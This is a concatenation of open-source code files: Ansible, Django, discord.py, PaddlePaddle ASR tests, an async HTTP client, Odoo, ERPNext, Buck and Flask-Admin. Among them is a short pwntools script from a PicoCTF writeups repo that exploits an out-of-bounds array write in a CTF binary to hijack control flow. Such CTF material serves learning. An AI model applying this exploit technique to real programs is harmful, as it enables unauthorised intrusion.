state=dict(choices=['present', 'absent'], default='present',
required=False),
admin_state=dict(choices=['up', 'down'], required=False),
include_defaults=dict(default=False),
config=dict(),
save=dict(type='bool', default=False)
)
argument_spec.update(nxos_argument_spec)
argument_spec.update(nxos_argument_spec)
module = AnsibleModule(argument_spec=argument_spec,
mutually_exclusive=[['vlan_range', 'name'],
['vlan_id', 'vlan_range']],
supports_check_mode=True)
warnings = list()
check_args(module, warnings)
warnings = list()
check_args(module, warnings)
vlan_range = module.params['vlan_range']
vlan_id = module.params['vlan_id']
name = module.params['name']
vlan_state = module.params['vlan_state']
admin_state = module.params['admin_state']
mapped_vni = module.params['mapped_vni']
state = module.params['state']
changed = False
if vlan_id:
if not vlan_id.isdigit():
module.fail_json(msg='vlan_id must be a valid VLAN ID')
args = dict(name=name, vlan_state=vlan_state,
admin_state=admin_state, mapped_vni=mapped_vni)
proposed = dict((k, v) for k, v in args.items() if v is not None)
proposed_vlans_list = numerical_sort(vlan_range_to_list(
vlan_id or vlan_range))
existing_vlans_list = numerical_sort(get_list_of_vlans(module))
commands = []
existing = {}
if vlan_range:
if state == 'present':
# These are all of the VLANs being proposed that don't
# already exist on the switch
vlans_delta = list(
set(proposed_vlans_list).difference(existing_vlans_list))
commands = build_commands(vlans_delta, state)
elif state == 'absent':
# VLANs that are common between what is being proposed and
# what is on the switch
vlans_common = list(
set(proposed_vlans_list).intersection(existing_vlans_list))
commands = build_commands(vlans_common, state)
else:
existing = get_vlan(vlan_id, module)
if state == 'absent':
if existing:
commands = ['no vlan ' + vlan_id]
elif state == 'present':
if (existing.get('mapped_vni') == '0' and
proposed.get('mapped_vni') == 'default'):
proposed.pop('mapped_vni')
delta = dict(set(
proposed.items()).difference(existing.items()))
if delta or not existing:
commands = get_vlan_config_commands(delta, vlan_id)
end_state = existing
end_state_vlans_list = existing_vlans_list
if commands:
if existing.get('mapped_vni') and state != 'absent':
if (existing.get('mapped_vni') != proposed.get('mapped_vni') and
existing.get('mapped_vni') != '0' and proposed.get('mapped_vni') != 'default'):
commands.insert(1, 'no vn-segment')
if module.check_mode:
module.exit_json(changed=True,
commands=commands)
else:
load_config(module, commands)
changed = True
end_state_vlans_list = numerical_sort(get_list_of_vlans(module))
if 'configure' in commands:
commands.pop(0)
if vlan_id:
end_state = get_vlan(vlan_id, module)
results = {}
results['proposed_vlans_list'] = proposed_vlans_list
results['existing_vlans_list'] = existing_vlans_list
results['proposed'] = proposed
results['existing'] = existing
results['end_state'] = end_state
results['end_state_vlans_list'] = end_state_vlans_list
results['updates'] = commands
results['changed'] = changed
results['warnings'] = warnings
results['warnings'] = warnings
module.exit_json(**results)
if __name__ == '__main__':
main()
| gpl-3.0 |
incuna/django-orderable | orderable/tests/test_manager.py | 1 | 1893 | from django.test import TestCase
from .models import SubTask, Task
class TestOrderableManager(TestCase):
@classmethod
def setUpTestData(cls):
tasks = [Task.objects.create(sort_order=i) for i in range(3)]
cls.first_task, cls.middle_task, cls.last_task = tasks
def test_gets_next(self):
next_task = Task.objects.after(self.first_task)
self.assertEqual(next_task, self.middle_task)
def test_gets_previous(self):
previous_task = Task.objects.before(self.last_task)
self.assertEqual(previous_task, self.middle_task)
def test_returns_none_if_after_on_last(self):
next_task = Task.objects.after(self.last_task)
self.assertIsNone(next_task)
def test_returns_none_if_previous_on_first(self):
previous_task = Task.objects.before(self.first_task)
self.assertIsNone(previous_task)
class TestOrderableRelatedManager(TestCase):
@classmethod
def setUpTestData(cls):
cls.task = Task.objects.create()
sub_tasks = [
SubTask.objects.create(task=cls.task, sort_order=i) for i in range(3)
]
cls.first_sub_task, cls.middle_sub_task, cls.last_sub_task = sub_tasks
def test_gets_next(self):
next_sub_task = self.task.subtask_set.after(self.first_sub_task)
self.assertEqual(next_sub_task, self.middle_sub_task)
def test_gets_previous(self):
previous_sub_task = self.task.subtask_set.before(self.last_sub_task)
self.assertEqual(previous_sub_task, self.middle_sub_task)
def test_returns_none_if_after_on_last(self):
next_sub_task = self.task.subtask_set.after(self.last_sub_task)
self.assertIsNone(next_sub_task)
def test_returns_none_if_previous_on_first(self):
previous_sub_task = self.task.subtask_set.before(self.first_sub_task)
self.assertIsNone(previous_sub_task)
| bsd-2-clause |
Rapptz/discord.py | discord/ext/commands/_types.py | 2 | 1265 | """
The MIT License (MIT)
Copyright (c) 2015-present Rapptz
Permission is hereby granted, free of charge, to any person obtaining a
copy of this software and associated documentation files (the "Software"),
to deal in the Software without restriction, including without limitation
the rights to use, copy, modify, merge, publish, distribute, sublicense,
and/or sell copies of the Software, and to permit persons to whom the
Software is furnished to do so, subject to the following conditions:
The above copyright notice and this permission notice shall be included in
all copies or substantial portions of the Software.
THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS
OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING
FROM, OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER
DEALINGS IN THE SOFTWARE.
"""
# This is merely a tag type to avoid circular import issues.
# Yes, this is a terrible solution but ultimately it is the only solution.
class _BaseCommand:
__slots__ = ()
| mit |
lcy-seso/models | fluid/DeepASR/data_utils/augmentor/tests/test_data_trans.py | 4 | 4878 | from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import sys
import unittest
import numpy as np
import data_utils.augmentor.trans_mean_variance_norm as trans_mean_variance_norm
import data_utils.augmentor.trans_add_delta as trans_add_delta
import data_utils.augmentor.trans_splice as trans_splice
import data_utils.augmentor.trans_delay as trans_delay
class TestTransMeanVarianceNorm(unittest.TestCase):
"""unit test for TransMeanVarianceNorm
"""
def setUp(self):
self._file_path = "./data_utils/augmentor/tests/data/" \
"global_mean_var_search26kHr"
def test(self):
feature = np.zeros((2, 120), dtype="float32")
feature.fill(1)
trans = trans_mean_variance_norm.TransMeanVarianceNorm(self._file_path)
(feature1, label1, name) = trans.perform_trans((feature, None, None))
(mean, var) = trans.get_mean_var()
feature_flat1 = feature1.flatten()
feature_flat = feature.flatten()
one = np.ones((1), dtype="float32")
for idx, val in enumerate(feature_flat1):
cur_idx = idx % 120
self.assertAlmostEqual(val, (one[0] - mean[cur_idx]) * var[cur_idx])
class TestTransAddDelta(unittest.TestCase):
"""unit test TestTransAddDelta
"""
def test_regress(self):
"""test regress
"""
feature = np.zeros((14, 120), dtype="float32")
feature[0:5, 0:40].fill(1)
feature[0 + 5, 0:40].fill(1)
feature[1 + 5, 0:40].fill(2)
feature[2 + 5, 0:40].fill(3)
feature[3 + 5, 0:40].fill(4)
feature[8:14, 0:40].fill(4)
trans = trans_add_delta.TransAddDelta()
feature = feature.reshape((14 * 120))
trans._regress(feature, 5 * 120, feature, 5 * 120 + 40, 40, 4, 120)
trans._regress(feature, 5 * 120 + 40, feature, 5 * 120 + 80, 40, 4, 120)
feature = feature.reshape((14, 120))
tmp_feature = feature[5:5 + 4, :]
self.assertAlmostEqual(1.0, tmp_feature[0][0])
self.assertAlmostEqual(0.24, tmp_feature[0][119])
self.assertAlmostEqual(2.0, tmp_feature[1][0])
self.assertAlmostEqual(0.13, tmp_feature[1][119])
self.assertAlmostEqual(3.0, tmp_feature[2][0])
self.assertAlmostEqual(-0.13, tmp_feature[2][119])
self.assertAlmostEqual(4.0, tmp_feature[3][0])
self.assertAlmostEqual(-0.24, tmp_feature[3][119])
def test_perform(self):
"""test perform
"""
feature = np.zeros((4, 40), dtype="float32")
feature[0, 0:40].fill(1)
feature[1, 0:40].fill(2)
feature[2, 0:40].fill(3)
feature[3, 0:40].fill(4)
trans = trans_add_delta.TransAddDelta()
(feature, label, name) = trans.perform_trans((feature, None, None))
self.assertAlmostEqual(feature.shape[0], 4)
self.assertAlmostEqual(feature.shape[1], 120)
self.assertAlmostEqual(1.0, feature[0][0])
self.assertAlmostEqual(0.24, feature[0][119])
self.assertAlmostEqual(2.0, feature[1][0])
self.assertAlmostEqual(0.13, feature[1][119])
self.assertAlmostEqual(3.0, feature[2][0])
self.assertAlmostEqual(-0.13, feature[2][119])
self.assertAlmostEqual(4.0, feature[3][0])
self.assertAlmostEqual(-0.24, feature[3][119])
class TestTransSplict(unittest.TestCase):
"""unit test Test TransSplict
"""
def test_perfrom(self):
feature = np.zeros((8, 10), dtype="float32")
for i in xrange(feature.shape[0]):
feature[i, :].fill(i)
trans = trans_splice.TransSplice()
(feature, label, name) = trans.perform_trans((feature, None, None))
self.assertEqual(feature.shape[1], 110)
for i in xrange(8):
nzero_num = 5 - i
cur_val = 0.0
if nzero_num < 0:
cur_val = i - 5 - 1
for j in xrange(11):
if j <= nzero_num:
for k in xrange(10):
self.assertAlmostEqual(feature[i][j * 10 + k], cur_val)
else:
if cur_val < 7:
cur_val += 1.0
for k in xrange(10):
self.assertAlmostEqual(feature[i][j * 10 + k], cur_val)
class TestTransDelay(unittest.TestCase):
"""unittest TransDelay
"""
def test_perform(self):
label = np.zeros((10, 1), dtype="int64")
for i in xrange(10):
label[i][0] = i
trans = trans_delay.TransDelay(5)
(_, label, _) = trans.perform_trans((None, label, None))
for i in xrange(5):
self.assertAlmostEqual(label[i + 5][0], i)
for i in xrange(5):
self.assertAlmostEqual(label[i][0], 0)
if __name__ == '__main__':
unittest.main()
| apache-2.0 |
brianjpetersen/exfoliate | exfoliate/exfoliate.py | 1 | 12796 | """Exfoliate is the asynchronous HTTP client for developers who prefer synchronous Python.
Enjoy the benefits of a scalable, asynchronous HTTP client without worrying about coroutines or
event loops. Exfoliate is the gentler, more Pythonic way to scrape the web.
"""
import asyncio
import aiohttp
import threading
import types
import concurrent.futures
import atexit
import json
import collections
import time
import chardet
# expose relevant aiohttp classes here
TCPConnector = aiohttp.TCPConnector
CookieJar = aiohttp.CookieJar
DummyCookieJar = aiohttp.DummyCookieJar
class Futures(collections.abc.Collection):
""" A container object that supports iterating over futures as the complete.
The two main differences between this class and concurrent.futures.as_completed are:
* concurrent.futures.as_completed works on any iterable containing futures, whereas Futures
is a tailored container object
* the Futures class reflects futures added to it during iteration
The latter of these differences is important to make exfoliate easier to use during web
scraping.
Note that this class is currently not thread-safe due to the duplicated data in _pending_set
and _pending_deque, which considered in combination are not updated atomically resulting in
potential race conditions.
"""
def __init__(self, futures=None):
self._complete_set = set()
self._pending_set = set()
self._pending_deque = collections.deque()
if futures is not None:
for future in futures:
self.add(future)
@property
def completed(self):
return self._complete_set
@property
def pending(self):
return self._pending_set
def add(self, future):
if future.done():
self._complete_set.add(future)
elif future not in self._pending_set:
self._pending_set.add(future)
self._pending_deque.append(future)
def remove(self, future):
if future in self._pending_set:
self._pending_set.remove(future)
self._pending_deque.remove(future)
elif future in self._complete_set:
self._complete_set.remove(future)
else:
raise KeyError(f'Futures object does not contain {future}')
def __contains__(self, future):
return (future in self._complete_set) or (future in self._pending_deque)
def __iter__(self):
for future in self._complete_set:
yield future
while len(self._pending_deque):
future = self._pending_deque[-1]
if future.done():
self._pending_set.remove(future)
self._pending_deque.pop()
self._complete_set.add(future)
yield future
else:
self._pending_deque.rotate(1)
time.sleep(0.1)
def __len__(self):
return len(self._complete_set) + len(self._pending_set)
def __repr__(self):
return 'Futures(({}))'.format(
', '.join(repr(future) for future in self._complete_set.union(self._pending_set))
)
class RequestException(IOError):
""" An ambiguous exception in completing a Request meant for subclassing.
"""
def __init__(self, *args, **kwargs):
response = kwargs.pop('response', None)
self.response = response
super(RequestException, self).__init__(*args, **kwargs)
class HTTPError(RequestException):
"""An HTTP error occurred."""
class Response:
""" A thin wrapper over aiohttp.ClientResponse to allow interaction with the response outside
the event loop.
Attributes:
url (str): URL of request
method (str): method of request, eg 'get'
version (aiohttp.HttpVersion): HTTP version of response
status_code (int): HTTP status code of response, eg 200
headers (multidict.CIMultiDictProxy): case-insensitive multidict representing the HTTP
headers of the response
history (tuple): Response instances of preceding requests (earliest request first) if there
were redirects, an empty tuple otherwise
cookies (http.cookies.SimpleCookie): HTTP cookies of response
content (bytes): HTTP body of response
"""
def __init__(self, url, method, version, status_code, headers, cookies, history, body):
self.url = url
self.method = method
self.version = version
self.status_code = status_code
self.headers = headers
self.history = history
self.cookies = cookies
self.body = self.content = body
def raise_for_status(self):
if 400 <= self.status_code < 500:
http_error_message = f'{self.status_code} Server Error for url: {self.url}'
elif 500 <= self.status_code < 600:
http_error_message = f'{self.status_code} Server Error for url: {self.url}'
else:
http_error_message = None
if http_error_message is not None:
raise HTTPError(http_error_message, response=self)
def json(self):
return json.loads(self.body)
def text(self, encoding=None, errors='strict'):
if encoding is None:
encoding = self._get_encoding()
return self.body.decode(encoding, errors=errors)
def _get_encoding(self):
ctype = self.headers.get(aiohttp.helpers.hdrs.CONTENT_TYPE, '').lower()
mtype, stype, _, params = aiohttp.helpers.parse_mimetype(ctype)
encoding = params.get('charset')
if not encoding:
if mtype == 'application' and stype == 'json':
# RFC 7159 states that the default encoding is UTF-8.
encoding = 'utf-8'
else:
encoding = chardet.detect(self.body)['encoding']
if not encoding:
encoding = 'utf-8'
return encoding
def __repr__(self):
return '<Response [{}]>'.format(self.status_code)
async def _arequest(method_name, event_loop, connector, cookie_jar, *args, **kwargs):
"""The workhorse async request aiohttp machinery underlying the synchronous Client.
Arguments:
method_name (str): the lowercase HTTP verb (eg, get or post) for the request
event_loop (asyncio.AbstractEventLoop): the event loop used for aiohttp
connector (aiohttp.TCPConnector): a connection pool to be shared by requests; this is managed
external to the session (see connector_owner=False)
cookie_jar (aiohttp.AbstractCookieJar): the cookie jar to be used for the request
*args: positional arguments to pass to aiohttp.method request
**kwargs: keyword arguments to pass to aiohttp.method request
Returns:
response (Response): the HTTP response
A session is created per request to ensure cookie isolation on a per request basis by default.
This is necessasry for correct handling of cookies for requests resulting in redirects. The
recommended aiohttp solution for this problem is using aiohttp.helpers.DummyCookieJar, but this
doesn't correctly handle cookies for requests resulting in redirects; see
https://github.com/aio-libs/aiohttp/issues/2067 for more details.
"""
session = aiohttp.ClientSession(
loop=event_loop,
connector=connector,
cookie_jar=cookie_jar,
connector_owner=False,
)
async with session:
method = getattr(session, method_name.lower())
async with method(*args, **kwargs) as response:
history = []
for redirect in response.history:
body = await redirect.read()
history.append(
Response(
redirect.url,
redirect.method,
redirect.version,
redirect.status,
redirect.headers,
redirect.cookies,
(),
body,
)
)
body = await response.read()
return Response(
response.url,
response.method,
response.version,
response.status,
response.headers,
response.cookies,
tuple(history),
body,
)
class Client:
"""An asynchronous HTTP client that lets you remain ignorant of coroutines, event loops, etc.
Example:
>>> client = Client()
>>> client.get('https://httpbin.org') # doesn't block!
>>> future = client.get(
... 'https://httpbin.org/headers',
... headers={'testing': 'exfoliate'},
... ) # returns a future!
>>> for future in client.futures: # iterate over the futures as they resolve!
... response = future.result()
... print(response)
<Response [200]>
<Response [200]>
Arguments:
connections (int): number of connections to use for connection pooling in the event a
connector is not supplied and one needs to be instantiated
cookie_jar (aiohttp.AbstractCookieJar or None): the cookie jar to be used for all requests
made through this client; if None, use a separate cookie jar for each request
connector (aiohttp.TCPConnector): a connection pool to be shared by requests
There are several known bugs affecting requests through aiohttp with proxies:
* https://github.com/aio-libs/aiohttp/issues/1340
* https://github.com/aio-libs/aiohttp/issues/1568
* http://bugs.python.org/issue29406
In addition, connection pooling with proxies in aiohttp seems to be bug-ridden as well.
For example:
>>> client = Client()
>>> client.get('https://httpbin.org/ip')
>>> client.get('https://httpbin.org/ip', proxy='...')
Both response bodies will show the IP address of the machine on which the client is being run.
The workaround is defining a custom TCPConnector and force connections to close:
>>> client = Client(connector=aiohttp.TCPConnector(force_close=True))
This has an appreciable negative impact on performance.
"""
def __init__(self, connections=100, cookie_jar=None, connector=None):
self.cookie_jar = cookie_jar
if connector is None:
self.event_loop = asyncio.SelectorEventLoop()
connector = aiohttp.TCPConnector(limit=connections, loop=self.event_loop)
else:
self.event_loop = connector._loop
self.connector = connector
atexit.register(self.connector.close)
self.futures = Futures()
self.thread = threading.Thread(target=self.event_loop.run_forever, daemon=True)
self.thread.start()
def get(self, *args, **kwargs):
return self._request('get', *args, **kwargs)
def put(self, *args, **kwargs):
return self._request('put', *args, **kwargs)
def post(self, *args, **kwargs):
return self._request('post', *args, **kwargs)
def delete(self, *args, **kwargs):
return self._request('delete', *args, **kwargs)
def head(self, *args, **kwargs):
return self._request('head', *args, **kwargs)
def options(self, *args, **kwargs):
return self._request('options', *args, **kwargs)
def _request(self, method_name, *args, **kwargs):
"""Submit the request to the event loop running in thread and bind the future to the client.
"""
request = _arequest(
method_name,
self.event_loop,
self.connector,
self.cookie_jar,
*args,
**kwargs,
)
future = asyncio.run_coroutine_threadsafe(request, self.event_loop)
future.response = future.result
future._request = {
'client': self,
'method_name': method_name,
'*args': args,
'**kwargs': kwargs,
}
def repeat(future):
"""Repeat the request that yielded this future with the same client and arguments.
"""
request = future._request
client = request['client']
method = getattr(client, method_name)
args = request['*args']
kwargs = request['**kwargs']
return method(*args, **kwargs)
future.repeat = future.retry = types.MethodType(repeat, future)
self.futures.add(future)
return future
| mit |
andreparames/odoo | addons/board/board.py | 69 | 6646 | # -*- coding: utf-8 -*-
##############################################################################
#
# OpenERP, Open Source Management Solution
# Copyright (C) 2004-2010 Tiny SPRL (<http://tiny.be>).
# Copyright (C) 2010-2013 OpenERP s.a. (<http://openerp.com>).
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU Affero General Public License as
# published by the Free Software Foundation, either version 3 of the
# License, or (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU Affero General Public License for more details.
#
# You should have received a copy of the GNU Affero General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
#
##############################################################################
from operator import itemgetter
from textwrap import dedent
from openerp import tools, SUPERUSER_ID
from openerp.osv import fields, osv
class board_board(osv.osv):
_name = 'board.board'
_description = "Board"
_auto = False
_columns = {}
@tools.cache()
def list(self, cr, uid, context=None):
Actions = self.pool.get('ir.actions.act_window')
Menus = self.pool.get('ir.ui.menu')
IrValues = self.pool.get('ir.values')
act_ids = Actions.search(cr, uid, [('res_model', '=', self._name)], context=context)
refs = ['%s,%s' % (Actions._name, act_id) for act_id in act_ids]
# cannot search "action" field on menu (non stored function field without search_fnct)
irv_ids = IrValues.search(cr, uid, [
('model', '=', 'ir.ui.menu'),
('key', '=', 'action'),
('key2', '=', 'tree_but_open'),
('value', 'in', refs),
], context=context)
menu_ids = map(itemgetter('res_id'), IrValues.read(cr, uid, irv_ids, ['res_id'], context=context))
menu_names = Menus.name_get(cr, uid, menu_ids, context=context)
return [dict(id=m[0], name=m[1]) for m in menu_names]
def _clear_list_cache(self):
self.list.clear_cache(self)
def create(self, cr, user, vals, context=None):
return 0
def fields_view_get(self, cr, user, view_id=None, view_type='form', context=None, toolbar=False, submenu=False):
"""
Overrides orm field_view_get.
@return: Dictionary of Fields, arch and toolbar.
"""
res = {}
res = super(board_board, self).fields_view_get(cr, user, view_id, view_type,
context, toolbar=toolbar, submenu=submenu)
CustView = self.pool.get('ir.ui.view.custom')
vids = CustView.search(cr, user, [('user_id', '=', user), ('ref_id', '=', view_id)], context=context)
if vids:
view_id = vids[0]
arch = CustView.browse(cr, user, view_id, context=context)
res['custom_view_id'] = view_id
res['arch'] = arch.arch
res['arch'] = self._arch_preprocessing(cr, user, res['arch'], context=context)
res['toolbar'] = {'print': [], 'action': [], 'relate': []}
return res
def _arch_preprocessing(self, cr, user, arch, context=None):
from lxml import etree
def remove_unauthorized_children(node):
for child in node.iterchildren():
if child.tag == 'action' and child.get('invisible'):
node.remove(child)
else:
child = remove_unauthorized_children(child)
return node
def encode(s):
if isinstance(s, unicode):
return s.encode('utf8')
return s
archnode = etree.fromstring(encode(arch))
return etree.tostring(remove_unauthorized_children(archnode), pretty_print=True)
class board_create(osv.osv_memory):
def board_create(self, cr, uid, ids, context=None):
assert len(ids) == 1
this = self.browse(cr, uid, ids[0], context=context)
view_arch = dedent("""<?xml version="1.0"?>
<form string="%s" version="7.0">
<board style="2-1">
<column/>
<column/>
</board>
</form>
""".strip() % (this.name,))
view_id = self.pool.get('ir.ui.view').create(cr, uid, {
'name': this.name,
'model': 'board.board',
'priority': 16,
'type': 'form',
'arch': view_arch,
}, context=context)
action_id = self.pool.get('ir.actions.act_window').create(cr, uid, {
'name': this.name,
'view_type': 'form',
'view_mode': 'form',
'res_model': 'board.board',
'usage': 'menu',
'view_id': view_id,
'help': dedent('''<div class="oe_empty_custom_dashboard">
<p>
<b>This dashboard is empty.</b>
</p><p>
To add the first report into this dashboard, go to any
menu, switch to list or graph view, and click <i>'Add to
Dashboard'</i> in the extended search options.
</p><p>
You can filter and group data before inserting into the
dashboard using the search options.
</p>
</div>
''')
}, context=context)
menu_id = self.pool.get('ir.ui.menu').create(cr, SUPERUSER_ID, {
'name': this.name,
'parent_id': this.menu_parent_id.id,
'action': 'ir.actions.act_window,%s' % (action_id,)
}, context=context)
self.pool.get('board.board')._clear_list_cache()
return {
'type': 'ir.actions.client',
'tag': 'reload',
'params': {
'menu_id': menu_id
},
}
def _default_menu_parent_id(self, cr, uid, context=None):
_, menu_id = self.pool.get('ir.model.data').get_object_reference(cr, uid, 'base', 'menu_reporting_dashboard')
return menu_id
_name = "board.create"
_description = "Board Creation"
_columns = {
'name': fields.char('Board Name', required=True),
'menu_parent_id': fields.many2one('ir.ui.menu', 'Parent Menu', required=True),
}
_defaults = {
'menu_parent_id': _default_menu_parent_id,
}
# vim:expandtab:smartindent:tabstop=4:softtabstop=4:shiftwidth=4:
| agpl-3.0 |
suyashphadtare/sajil-final-erp | erpnext/utilities/doctype/contact/contact.py | 36 | 2444 | # Copyright (c) 2013, Web Notes Technologies Pvt. Ltd. and Contributors
# License: GNU General Public License v3. See license.txt
from __future__ import unicode_literals
import frappe
from frappe.utils import cstr, extract_email_id
from erpnext.controllers.status_updater import StatusUpdater
class Contact(StatusUpdater):
def autoname(self):
# concat first and last name
self.name = " ".join(filter(None,
[cstr(self.get(f)).strip() for f in ["first_name", "last_name"]]))
# concat party name if reqd
for fieldname in ("customer", "supplier", "sales_partner"):
if self.get(fieldname):
self.name = self.name + "-" + cstr(self.get(fieldname)).strip()
break
def validate(self):
self.set_status()
self.validate_primary_contact()
def validate_primary_contact(self):
if self.is_primary_contact == 1:
if self.customer:
frappe.db.sql("update tabContact set is_primary_contact=0 where customer = %s",
(self.customer))
elif self.supplier:
frappe.db.sql("update tabContact set is_primary_contact=0 where supplier = %s",
(self.supplier))
elif self.sales_partner:
frappe.db.sql("""update tabContact set is_primary_contact=0
where sales_partner = %s""", (self.sales_partner))
else:
if self.customer:
if not frappe.db.sql("select name from tabContact \
where is_primary_contact=1 and customer = %s", (self.customer)):
self.is_primary_contact = 1
elif self.supplier:
if not frappe.db.sql("select name from tabContact \
where is_primary_contact=1 and supplier = %s", (self.supplier)):
self.is_primary_contact = 1
elif self.sales_partner:
if not frappe.db.sql("select name from tabContact \
where is_primary_contact=1 and sales_partner = %s",
self.sales_partner):
self.is_primary_contact = 1
def on_trash(self):
frappe.db.sql("""update `tabSupport Ticket` set contact='' where contact=%s""",
self.name)
@frappe.whitelist()
def get_contact_details(contact):
contact = frappe.get_doc("Contact", contact)
out = {
"contact_person": contact.get("name"),
"contact_display": " ".join(filter(None,
[contact.get("first_name"), contact.get("last_name")])),
"contact_email": contact.get("email_id"),
"contact_mobile": contact.get("mobile_no"),
"contact_phone": contact.get("phone"),
"contact_designation": contact.get("designation"),
"contact_department": contact.get("department")
}
return out | agpl-3.0 |
Caesurus/CTF_Writeups | 2019-PicoCTF/exploits/exploit_limitless.py | 1 | 1649 | #!/usr/bin/env python2
# -*- coding: utf-8 -*-
# This exploit template was generated via:
# $ pwn template ./vuln
from pwn import *
# Set up pwntools for the correct architecture
exe = context.binary = ELF('./vuln')
# Many built-in settings can be controlled on the command-line and show up
# in "args". For example, to dump all data sent/received, and disable ASLR
# for all created processes...
# ./exploit.py DEBUG NOASLR
def start(argv=[], *a, **kw):
'''Start the exploit against the target.'''
if args.GDB:
return gdb.debug([exe.path] + argv, gdbscript=gdbscript, *a, **kw)
else:
return process([exe.path] + argv, *a, **kw)
# Specify your GDB script here for debugging
# GDB will be launched if the exploit is run via e.g.
# ./exploit.py GDB
gdbscript = '''
#break *0x{exe.symbols.main:x}
b *0x0804865c
continue
'''.format(**locals())
#===========================================================
# EXPLOIT GOES HERE
#===========================================================
# Arch: i386-32-little
# RELRO: Partial RELRO
# Stack: No canary found
# NX: NX enabled
# PIE: No PIE (0x8048000)
"""
Input the integer value you want to put in the array
1
Input the index in which you want to put the value
"""
io = start()
value = 0x080485c6
idx = -5
io.recvuntil("put in the array")
io.sendline(str(value))
io.recvuntil("to put the value")
io.sendline(str(idx))
# shellcode = asm(shellcraft.sh())
# payload = fit({
# 32: 0xdeadbeef,
# 'iaaa': [1, 2, 'Hello', 3]
# }, length=128)
# io.send(payload)
# flag = io.recv(...)
# log.success(flag)
io.interactive()
| apache-2.0 |
zhan-xiong/buck | src/com/facebook/buck/json/buck_parser/util.py | 17 | 3019 | """Buck agnostic utility functions.
"""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
from __future__ import with_statement
from collections import namedtuple
import copy
import functools
import inspect
import subprocess
import sys
import os
def is_in_dir(filepath, directory):
"""Returns true if `filepath` is in `directory`."""
path = os.path.abspath(filepath)
# Make 'directory' end with '/' (os.sep) to detect that '/a/foo.py' is not in '/a/f' etc.
directory = os.path.join(os.path.abspath(directory), '')
return os.path.commonprefix([path, directory]) == directory
def get_caller_frame(skip=None):
"""Get the stack frame from where the function was called.
:param list[str] skip:
:rtype: types.FrameType
"""
if skip is None:
skip = []
skip = set([__name__] + skip)
# Look up the caller's stack frame, skipping specified names.
frame = inspect.currentframe()
# Use 'get' as '__name__' may not exist if 'eval' was used ('get' will return None then).
while frame.f_globals.get('__name__') in skip:
frame = frame.f_back
return frame
def cygwin_adjusted_path(path):
"""Convert windows paths to unix paths if running within cygwin."""
if sys.platform == 'cygwin':
return subprocess.check_output(['cygpath', path]).rstrip()
else:
return path
def memoized(deepcopy=True, keyfunc=None):
"""Decorator. Caches a function's return value each time it is called.
If called later with the same arguments, the cached value is returned
(not reevaluated).
Makes a defensive copy of the cached value each time it's returned,
so callers mutating the result do not poison the cache, unless
deepcopy is set to False.
"""
def decorator(func):
cache = {}
@functools.wraps(func)
def wrapped(*args, **kwargs):
# poor-man's cache key; the keyword args are sorted to avoid dictionary ordering
# issues (insertion and deletion order matters). Nested dictionaries will still cause
# cache misses.
if keyfunc is None:
cache_key = repr(args) + repr(sorted(kwargs.items()))
else:
cache_key = keyfunc(*args, **kwargs)
_sentinel = object()
value = cache.get(cache_key, _sentinel)
if value is _sentinel:
value = func(*args, **kwargs)
cache[cache_key] = value
# Return a copy to ensure callers mutating the result don't poison the cache.
if deepcopy:
value = copy.deepcopy(value)
return value
wrapped._cache = cache
return wrapped
return decorator
Diagnostic = namedtuple('Diagnostic', ['message', 'level', 'source', 'exception'])
def is_special(pat):
"""Whether the given pattern string contains match constructs."""
return "*" in pat or "?" in pat or "[" in pat
| apache-2.0 |
toddetzel/flask-admin | flask_admin/contrib/mongoengine/typefmt.py | 44 | 1357 | from jinja2 import Markup, escape
from mongoengine.base import BaseList
from mongoengine.fields import GridFSProxy, ImageGridFsProxy
from flask_admin.model.typefmt import BASE_FORMATTERS, list_formatter
from . import helpers
def grid_formatter(view, value):
if not value.grid_id:
return ''
args = helpers.make_gridfs_args(value)
return Markup(
('<a href="%(url)s" target="_blank">' +
'<i class="icon-file"></i>%(name)s' +
'</a> %(size)dk (%(content_type)s)') %
{
'url': view.get_url('.api_file_view', **args),
'name': escape(value.name),
'size': value.length // 1024,
'content_type': escape(value.content_type)
})
def grid_image_formatter(view, value):
if not value.grid_id:
return ''
return Markup(
('<div class="image-thumbnail">' +
'<a href="%(url)s" target="_blank"><img src="%(thumb)s"/></a>' +
'</div>') %
{
'url': view.get_url('.api_file_view', **helpers.make_gridfs_args(value)),
'thumb': view.get_url('.api_file_view', **helpers.make_thumb_args(value)),
})
DEFAULT_FORMATTERS = BASE_FORMATTERS.copy()
DEFAULT_FORMATTERS.update({
BaseList: list_formatter,
GridFSProxy: grid_formatter,
ImageGridFsProxy: grid_image_formatter
})
| bsd-3-clause |
maxamillion/ansible | lib/ansible/plugins/inventory/toml.py | 29 | 8190 | # Copyright (c) 2018 Matt Martz <matt@sivel.net>
# GNU General Public License v3.0+ (see COPYING or https://www.gnu.org/licenses/gpl-3.0.txt)
from __future__ import (absolute_import, division, print_function)
__metaclass__ = type
DOCUMENTATION = r'''
name: toml
version_added: "2.8"
short_description: Uses a specific TOML file as an inventory source.
description:
- TOML based inventory format
- File MUST have a valid '.toml' file extension
notes:
- Requires the 'toml' python library
'''
EXAMPLES = r'''# fmt: toml
# Example 1
[all.vars]
has_java = false
[web]
children = [
"apache",
"nginx"
]
vars = { http_port = 8080, myvar = 23 }
[web.hosts]
host1 = {}
host2 = { ansible_port = 222 }
[apache.hosts]
tomcat1 = {}
tomcat2 = { myvar = 34 }
tomcat3 = { mysecret = "03#pa33w0rd" }
[nginx.hosts]
jenkins1 = {}
[nginx.vars]
has_java = true
# Example 2
[all.vars]
has_java = false
[web]
children = [
"apache",
"nginx"
]
[web.vars]
http_port = 8080
myvar = 23
[web.hosts.host1]
[web.hosts.host2]
